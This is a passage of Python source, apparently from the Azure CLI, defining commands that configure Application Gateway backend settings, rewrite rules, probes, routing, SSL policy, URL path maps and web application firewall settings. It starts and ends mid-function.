probe=None, protocol='http', cookie_based_affinity=None, timeout=None,
no_wait=False, connection_draining_timeout=0,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
ApplicationGatewayBackendHttpSettings, ApplicationGatewayConnectionDraining, SubResource = cmd.get_models(
'ApplicationGatewayBackendHttpSettings', 'ApplicationGatewayConnectionDraining', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_settings = ApplicationGatewayBackendHttpSettings(
port=port,
protocol=protocol,
cookie_based_affinity=cookie_based_affinity or 'Disabled',
request_timeout=timeout,
probe=SubResource(id=probe) if probe else None,
name=item_name)
if cmd.supported_api_version(min_api='2016-09-01'):
new_settings.authentication_certificates = [SubResource(id=x) for x in auth_certs or []]
if cmd.supported_api_version(min_api='2016-12-01'):
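        # 'enabled' is derived from the timeout (0 disables draining), and
        # drain_timeout_in_sec falls back to 1 so the model always gets a positive value.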
new_settings.connection_draining = \
ApplicationGatewayConnectionDraining(
enabled=bool(connection_draining_timeout), drain_timeout_in_sec=connection_draining_timeout or 1)
if cmd.supported_api_version(min_api='2017-06-01'):
new_settings.host_name = host_name
new_settings.pick_host_name_from_backend_address = host_name_from_backend_pool
new_settings.affinity_cookie_name = affinity_cookie_name
new_settings.probe_enabled = enable_probe
new_settings.path = path
if cmd.supported_api_version(min_api='2019-04-01'):
new_settings.trusted_root_certificates = [SubResource(id=x) for x in root_certs or []]
upsert_to_collection(ag, 'backend_http_settings_collection', new_settings, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_http_settings_collection(cmd, instance, parent, item_name, port=None, probe=None, protocol=None,
cookie_based_affinity=None, timeout=None,
connection_draining_timeout=None,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
SubResource = cmd.get_models('SubResource')
if auth_certs == "":
instance.authentication_certificates = None
elif auth_certs is not None:
instance.authentication_certificates = [SubResource(id=x) for x in auth_certs]
if root_certs == "":
instance.trusted_root_certificates = None
elif root_certs is not None:
instance.trusted_root_certificates = [SubResource(id=x) for x in root_certs]
if port is not None:
instance.port = port
if probe is not None:
instance.probe = SubResource(id=probe)
if protocol is not None:
instance.protocol = protocol
if cookie_based_affinity is not None:
instance.cookie_based_affinity = cookie_based_affinity
if timeout is not None:
instance.request_timeout = timeout
if connection_draining_timeout is not None:
instance.connection_draining = {
'enabled': bool(connection_draining_timeout),
'drain_timeout_in_sec': connection_draining_timeout or 1
}
if host_name is not None:
instance.host_name = host_name
if host_name_from_backend_pool is not None:
instance.pick_host_name_from_backend_address = host_name_from_backend_pool
if affinity_cookie_name is not None:
instance.affinity_cookie_name = affinity_cookie_name
if enable_probe is not None:
instance.probe_enabled = enable_probe
if path is not None:
instance.path = path
return parent
def create_ag_redirect_configuration(cmd, resource_group_name, application_gateway_name, item_name, redirect_type,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, no_wait=False):
ApplicationGatewayRedirectConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayRedirectConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_config = ApplicationGatewayRedirectConfiguration(
name=item_name,
redirect_type=redirect_type,
target_listener=SubResource(id=target_listener) if target_listener else None,
target_url=target_url,
include_path=include_path,
include_query_string=include_query_string)
upsert_to_collection(ag, 'redirect_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_redirect_configuration(cmd, instance, parent, item_name, redirect_type=None,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, raw=False):
SubResource = cmd.get_models('SubResource')
if redirect_type:
instance.redirect_type = redirect_type
if target_listener:
instance.target_listener = SubResource(id=target_listener)
instance.target_url = None
if target_url:
instance.target_listener = None
instance.target_url = target_url
if include_path is not None:
instance.include_path = include_path
if include_query_string is not None:
instance.include_query_string = include_query_string
return parent
def create_ag_rewrite_rule_set(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False):
ApplicationGatewayRewriteRuleSet = cmd.get_models(
'ApplicationGatewayRewriteRuleSet')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_set = ApplicationGatewayRewriteRuleSet(name=item_name)
upsert_to_collection(ag, 'rewrite_rule_sets', new_set, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, item_name,
path='rewrite_rule_sets', key_path='name')
def update_ag_rewrite_rule_set(instance, parent, item_name):
return parent
def create_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
sequence=None, request_headers=None, response_headers=None, no_wait=False,
modified_path=None, modified_query_string=None, enable_reroute=None):
(ApplicationGatewayRewriteRule,
ApplicationGatewayRewriteRuleActionSet,
ApplicationGatewayUrlConfiguration) = cmd.get_models('ApplicationGatewayRewriteRule',
'ApplicationGatewayRewriteRuleActionSet',
'ApplicationGatewayUrlConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(ag, rule_set_name,
path='rewrite_rule_sets', key_path='name')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
new_rule = ApplicationGatewayRewriteRule(
name=rule_name,
rule_sequence=sequence,
action_set=ApplicationGatewayRewriteRuleActionSet(
request_header_configurations=request_headers,
response_header_configurations=response_headers,
url_configuration=url_configuration
)
)
upsert_to_collection(rule_set, 'rewrite_rules', new_rule, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def update_ag_rewrite_rule(instance, parent, cmd, rule_set_name, rule_name, sequence=None,
request_headers=None, response_headers=None,
modified_path=None, modified_query_string=None, enable_reroute=None):
with cmd.update_context(instance) as c:
c.set_param('rule_sequence', sequence)
c.set_param('action_set.request_header_configurations', request_headers)
c.set_param('action_set.response_header_configurations', response_headers)
ApplicationGatewayUrlConfiguration = cmd.get_models('ApplicationGatewayUrlConfiguration')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
c.set_param('action_set.url_configuration', url_configuration)
return parent
def show_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def list_ag_rewrite_rules(cmd, resource_group_name, application_gateway_name, rule_set_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, path='rewrite_rule_sets.rewrite_rules', key_path='name')
def delete_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(gateway, rule_set_name, path='rewrite_rule_sets', key_path='name')
rule = find_child_item(rule_set, rule_name, path='rewrite_rules', key_path='name')
rule_set.rewrite_rules.remove(rule)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
variable, no_wait=False, pattern=None, ignore_case=None, negate=None):
ApplicationGatewayRewriteRuleCondition = cmd.get_models(
'ApplicationGatewayRewriteRuleCondition')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule = find_child_item(ag, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
new_condition = ApplicationGatewayRewriteRuleCondition(
variable=variable,
pattern=pattern,
ignore_case=ignore_case,
negate=negate
)
upsert_to_collection(rule, 'conditions', new_condition, 'variable')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def update_ag_rewrite_rule_condition(instance, parent, cmd, rule_set_name, rule_name, variable, pattern=None,
ignore_case=None, negate=None):
with cmd.update_context(instance) as c:
c.set_param('pattern', pattern)
c.set_param('ignore_case', ignore_case)
c.set_param('negate', negate)
return parent
def show_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def list_ag_rewrite_rule_conditions(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name')
def delete_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule = find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
condition = find_child_item(rule, variable, path='conditions', key_path='variable')
rule.conditions.remove(condition)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_probe(cmd, resource_group_name, application_gateway_name, item_name, protocol, host,
path, interval=30, timeout=120, threshold=8, no_wait=False, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
ApplicationGatewayProbe, ProbeMatchCriteria = cmd.get_models(
'ApplicationGatewayProbe', 'ApplicationGatewayProbeHealthResponseMatch')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_probe = ApplicationGatewayProbe(
name=item_name,
protocol=protocol,
host=host,
path=path,
interval=interval,
timeout=timeout,
unhealthy_threshold=threshold)
if cmd.supported_api_version(min_api='2017-06-01'):
new_probe.pick_host_name_from_backend_http_settings = host_name_from_http_settings
new_probe.min_servers = min_servers
new_probe.match = ProbeMatchCriteria(body=match_body, status_codes=match_status_codes)
if cmd.supported_api_version(min_api='2019-04-01'):
new_probe.port = port
upsert_to_collection(ag, 'probes', new_probe, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_probe(cmd, instance, parent, item_name, protocol=None, host=None, path=None,
interval=None, timeout=None, threshold=None, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
if protocol is not None:
instance.protocol = protocol
if host is not None:
instance.host = host
if path is not None:
instance.path = path
if interval is not None:
instance.interval = interval
if timeout is not None:
instance.timeout = timeout
if threshold is not None:
instance.unhealthy_threshold = threshold
if host_name_from_http_settings is not None:
instance.pick_host_name_from_backend_http_settings = host_name_from_http_settings
if min_servers is not None:
instance.min_servers = min_servers
if match_body is not None or match_status_codes is not None:
ProbeMatchCriteria = \
cmd.get_models('ApplicationGatewayProbeHealthResponseMatch')
instance.match = instance.match or ProbeMatchCriteria()
if match_body is not None:
instance.match.body = match_body
if match_status_codes is not None:
instance.match.status_codes = match_status_codes
if port is not None:
instance.port = port
return parent
def create_ag_request_routing_rule(cmd, resource_group_name, application_gateway_name, item_name,
address_pool=None, http_settings=None, http_listener=None, redirect_config=None,
url_path_map=None, rule_type='Basic', no_wait=False, rewrite_rule_set=None,
priority=None):
ApplicationGatewayRequestRoutingRule, SubResource = cmd.get_models(
'ApplicationGatewayRequestRoutingRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not address_pool and not redirect_config:
address_pool = _get_default_id(ag, 'backend_address_pools', '--address-pool')
if not http_settings and not redirect_config:
http_settings = _get_default_id(ag, 'backend_http_settings_collection', '--http-settings')
if not http_listener:
http_listener = _get_default_id(ag, 'http_listeners', '--http-listener')
new_rule = ApplicationGatewayRequestRoutingRule(
name=item_name,
rule_type=rule_type,
priority=priority,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
http_listener=SubResource(id=http_listener),
url_path_map=SubResource(id=url_path_map) if url_path_map else None)
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
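    # Recover the string 'rewrite_rule_set' from locals() so supported_api_version can be
    # queried by parameter name rather than by a hard-coded API version.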
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
upsert_to_collection(ag, 'request_routing_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_request_routing_rule(cmd, instance, parent, item_name, address_pool=None,
http_settings=None, http_listener=None, redirect_config=None, url_path_map=None,
rule_type=None, rewrite_rule_set=None, priority=None):
SubResource = cmd.get_models('SubResource')
if address_pool is not None:
instance.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
instance.backend_http_settings = SubResource(id=http_settings)
if redirect_config is not None:
instance.redirect_configuration = SubResource(id=redirect_config)
if http_listener is not None:
instance.http_listener = SubResource(id=http_listener)
if url_path_map is not None:
instance.url_path_map = SubResource(id=url_path_map)
if rule_type is not None:
instance.rule_type = rule_type
if rewrite_rule_set is not None:
instance.rewrite_rule_set = SubResource(id=rewrite_rule_set)
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
return parent
def create_ag_ssl_certificate(cmd, resource_group_name, application_gateway_name, item_name, cert_data=None,
cert_password=None, key_vault_secret_id=None, no_wait=False):
ApplicationGatewaySslCertificate = cmd.get_models('ApplicationGatewaySslCertificate')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_cert = ApplicationGatewaySslCertificate(
name=item_name, data=cert_data, password=cert_password, key_vault_secret_id=key_vault_secret_id)
upsert_to_collection(ag, 'ssl_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_ssl_certificate(instance, parent, item_name,
cert_data=None, cert_password=None, key_vault_secret_id=None):
if cert_data is not None:
instance.data = cert_data
if cert_password is not None:
instance.password = cert_password
if key_vault_secret_id is not None:
instance.key_vault_secret_id = key_vault_secret_id
return parent
def set_ag_ssl_policy_2017_03_01(cmd, resource_group_name, application_gateway_name, disabled_ssl_protocols=None,
clear=False, no_wait=False):
ApplicationGatewaySslPolicy = cmd.get_models('ApplicationGatewaySslPolicy')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.ssl_policy = None if clear else ApplicationGatewaySslPolicy(
disabled_ssl_protocols=disabled_ssl_protocols)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_ssl_policy_2017_06_01(cmd, resource_group_name, application_gateway_name, policy_name=None, policy_type=None,
disabled_ssl_protocols=None, cipher_suites=None, min_protocol_version=None,
no_wait=False):
ApplicationGatewaySslPolicy, ApplicationGatewaySslPolicyType = cmd.get_models(
'ApplicationGatewaySslPolicy', 'ApplicationGatewaySslPolicyType')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
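    # policy_type is derived from the other arguments rather than taken verbatim: a named
    # predefined policy wins, otherwise custom cipher suites or a minimum protocol version
    # imply a custom policy.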
policy_type = None
if policy_name:
policy_type = ApplicationGatewaySslPolicyType.predefined.value
elif cipher_suites or min_protocol_version:
policy_type = ApplicationGatewaySslPolicyType.custom.value
ag.ssl_policy = ApplicationGatewaySslPolicy(
policy_name=policy_name,
policy_type=policy_type,
disabled_ssl_protocols=disabled_ssl_protocols,
cipher_suites=cipher_suites,
min_protocol_version=min_protocol_version)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_ssl_policy(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).ssl_policy
def create_ag_trusted_root_certificate(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False,
cert_data=None, keyvault_secret=None):
ApplicationGatewayTrustedRootCertificate = cmd.get_models('ApplicationGatewayTrustedRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
root_cert = ApplicationGatewayTrustedRootCertificate(name=item_name, data=cert_data,
key_vault_secret_id=keyvault_secret)
upsert_to_collection(ag, 'trusted_root_certificates', root_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_trusted_root_certificate(instance, parent, item_name, cert_data=None, keyvault_secret=None):
if cert_data is not None:
instance.data = cert_data
if keyvault_secret is not None:
instance.key_vault_secret_id = keyvault_secret
return parent
def create_ag_url_path_map(cmd, resource_group_name, application_gateway_name, item_name, paths,
address_pool=None, http_settings=None, redirect_config=None, rewrite_rule_set=None,
default_address_pool=None, default_http_settings=None, default_redirect_config=None,
no_wait=False, rule_name='default', default_rewrite_rule_set=None, firewall_policy=None):
ApplicationGatewayUrlPathMap, ApplicationGatewayPathRule, SubResource = cmd.get_models(
'ApplicationGatewayUrlPathMap', 'ApplicationGatewayPathRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_rule = ApplicationGatewayPathRule(
name=rule_name,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
paths=paths
)
new_map = ApplicationGatewayUrlPathMap(
name=item_name,
default_backend_address_pool=SubResource(id=default_address_pool) if default_address_pool else None,
default_backend_http_settings=SubResource(id=default_http_settings) if default_http_settings else None,
path_rules=[])
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
new_map.default_redirect_configuration = \
SubResource(id=default_redirect_config) if default_redirect_config else None
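    # Recover the local name of the rewrite_rule_set argument via locals() so it can be
    # passed as parameter_name to supported_api_version; the same pattern appears in
    # create_ag_url_path_map_rule below.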
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
new_map.default_rewrite_rule_set = \
SubResource(id=default_rewrite_rule_set) if default_rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
# pull defaults from the rule specific properties if the default-* option isn't specified
if new_rule.backend_address_pool and not new_map.default_backend_address_pool:
new_map.default_backend_address_pool = new_rule.backend_address_pool
if new_rule.backend_http_settings and not new_map.default_backend_http_settings:
new_map.default_backend_http_settings = new_rule.backend_http_settings
if new_rule.redirect_configuration and not new_map.default_redirect_configuration:
new_map.default_redirect_configuration = new_rule.redirect_configuration
new_map.path_rules.append(new_rule)
upsert_to_collection(ag, 'url_path_maps', new_map, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_url_path_map(cmd, instance, parent, item_name, default_address_pool=None,
default_http_settings=None, default_redirect_config=None, raw=False,
default_rewrite_rule_set=None):
SubResource = cmd.get_models('SubResource')
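    # Convention used below (and by the other update_* helpers): an empty string ('')
    # clears the corresponding reference, a resource ID sets it, and None (argument
    # omitted) leaves the existing value untouched. Illustrative only:
    #   default_address_pool=''        -> default_backend_address_pool = None
    #   default_address_pool=<poolId>  -> default_backend_address_pool = SubResource(id=<poolId>)
    #   default_address_pool=None      -> unchanged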
if default_address_pool == '':
instance.default_backend_address_pool = None
elif default_address_pool:
instance.default_backend_address_pool = SubResource(id=default_address_pool)
if default_http_settings == '':
instance.default_backend_http_settings = None
elif default_http_settings:
instance.default_backend_http_settings = SubResource(id=default_http_settings)
if default_redirect_config == '':
instance.default_redirect_configuration = None
elif default_redirect_config:
instance.default_redirect_configuration = SubResource(id=default_redirect_config)
if default_rewrite_rule_set == '':
instance.default_rewrite_rule_set = None
elif default_rewrite_rule_set:
instance.default_rewrite_rule_set = SubResource(id=default_rewrite_rule_set)
return parent
def create_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, paths, address_pool=None, http_settings=None, redirect_config=None,
firewall_policy=None, no_wait=False, rewrite_rule_set=None):
ApplicationGatewayPathRule, SubResource = cmd.get_models('ApplicationGatewayPathRule', 'SubResource')
if address_pool and redirect_config:
raise CLIError("Cannot reference a BackendAddressPool when Redirect Configuration is specified.")
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
default_backend_pool = SubResource(id=url_map.default_backend_address_pool.id) \
if (url_map.default_backend_address_pool and not redirect_config) else None
default_http_settings = SubResource(id=url_map.default_backend_http_settings.id) \
if url_map.default_backend_http_settings else None
new_rule = ApplicationGatewayPathRule(
name=item_name,
paths=paths,
backend_address_pool=SubResource(id=address_pool) if address_pool else default_backend_pool,
backend_http_settings=SubResource(id=http_settings) if http_settings else default_http_settings)
if cmd.supported_api_version(min_api='2017-06-01'):
default_redirect = SubResource(id=url_map.default_redirect_configuration.id) \
if (url_map.default_redirect_configuration and not address_pool) else None
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else default_redirect
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
upsert_to_collection(url_map, 'path_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def delete_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
url_map.path_rules = \
[x for x in url_map.path_rules if x.name.lower() != item_name.lower()]
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2016_09_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
no_wait=False):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2017_03_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
rule_set_type='OWASP', rule_set_version=None,
disabled_rule_groups=None,
disabled_rules=None, no_wait=False,
request_body_check=None, max_request_body_size=None, file_upload_limit=None,
exclusions=None):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode, rule_set_type=rule_set_type,
rule_set_version=rule_set_version)
if disabled_rule_groups or disabled_rules:
ApplicationGatewayFirewallDisabledRuleGroup = cmd.get_models('ApplicationGatewayFirewallDisabledRuleGroup')
disabled_groups = []
# disabled groups can be added directly
for group in disabled_rule_groups or []:
disabled_groups.append(ApplicationGatewayFirewallDisabledRuleGroup(rule_group_name=group))
def _flatten(collection, expand_property_fn):
for each in collection:
for value in expand_property_fn(each):
yield value
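        # e.g. _flatten(rule_sets, lambda r: r.rule_groups) yields every rule group of
        # every returned rule set as one flat stream (illustrative only)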
# for disabled rules, we have to look up the IDs
if disabled_rules:
results = list_ag_waf_rule_sets(ncf, _type=rule_set_type, version=rule_set_version, group='*')
for group in _flatten(results, lambda r: r.rule_groups):
disabled_group = ApplicationGatewayFirewallDisabledRuleGroup(
rule_group_name=group.rule_group_name, rules=[])
for rule in group.rules:
if str(rule.rule_id) in disabled_rules:
disabled_group.rules.append(rule.rule_id)
if disabled_group.rules:
disabled_groups.append(disabled_group)
ag.web_application_firewall_configuration.disabled_rule_groups = disabled_groups
if cmd.supported_api_version(min_api='2018-08-01'):
ag.web_application_firewall_configuration.request_body_check = request_body_check
ag.web_application_firewall_configuration.max_request_body_size_in_kb = max_request_body_size
ag.web_application_firewall_configuration.file_upload_limit_in_mb = file_upload_limit
ag.web_application_firewall_configuration.exclusions = exclusions
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_waf_config(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).web_application_firewall_configuration
def list_ag_waf_rule_sets(client, _type=None, version=None, group=None):
results = client.list_available_waf_rule_sets().value
filtered_results = []
# filter by rule set name or version
for rule_set in results:
if _type and _type.lower() != rule_set.rule_set_type.lower():
continue
if version and version.lower() != rule_set.rule_set_version.lower():
continue
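        # group=None strips rule details and keeps every group of a matching rule set;
        # group='*' keeps every group with its rules; a specific name keeps only that
        # group, rules included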
filtered_groups = []
for rule_group in rule_set.rule_groups:
if not group:
rule_group.rules = None
filtered_groups.append(rule_group)
elif group.lower() == rule_group.rule_group_name.lower() or group == '*':
filtered_groups.append(rule_group)
if filtered_groups:
rule_set.rule_groups = filtered_groups
filtered_results.append(rule_set)
return filtered_results
# endregion
# region ApplicationGatewayWAFPolicy
def create_ag_waf_policy(cmd, client, resource_group_name, policy_name,
location=None, tags=None, rule_set_type='OWASP',
rule_set_version='3.0'):
WebApplicationFirewallPolicy, ManagedRulesDefinition, \
ManagedRuleSet = cmd.get_models('WebApplicationFirewallPolicy',
'ManagedRulesDefinition',
'ManagedRuleSet')
# https://docs.microsoft.com/en-us/azure/application-gateway/waf-overview
# mandatory default rule with empty rule sets
managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type, rule_set_version=rule_set_version)
managed_rule_definition = ManagedRulesDefinition(managed_rule_sets=[managed_rule_set])
waf_policy = WebApplicationFirewallPolicy(location=location, tags=tags, managed_rules=managed_rule_definition)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_ag_waf_policy(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_ag_waf_policies(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'web_application_firewall_policies', resource_group_name)
# endregion
# region ApplicationGatewayWAFPolicyRules PolicySettings
def update_waf_policy_setting(cmd, instance,
state=None, mode=None,
max_request_body_size_in_kb=None, file_upload_limit_in_mb=None,
request_body_check=False):
if state is not None:
instance.policy_settings.state = state
if mode is not None:
instance.policy_settings.mode = mode
if max_request_body_size_in_kb is not None:
instance.policy_settings.max_request_body_size_in_kb = max_request_body_size_in_kb
if file_upload_limit_in_mb is not None:
instance.policy_settings.file_upload_limit_in_mb = file_upload_limit_in_mb
if request_body_check is not None:
instance.policy_settings.request_body_check = request_body_check
return instance
def list_waf_policy_setting(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).policy_settings
# endregion
# region ApplicationGatewayWAFPolicyRules
def create_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, priority, rule_type, action):
"""
    Initialize a custom rule for the WAF policy.
"""
WebApplicationFirewallCustomRule = cmd.get_models('WebApplicationFirewallCustomRule')
waf_policy = client.get(resource_group_name, policy_name)
new_custom_rule = WebApplicationFirewallCustomRule(
name=rule_name,
action=action,
match_conditions=[],
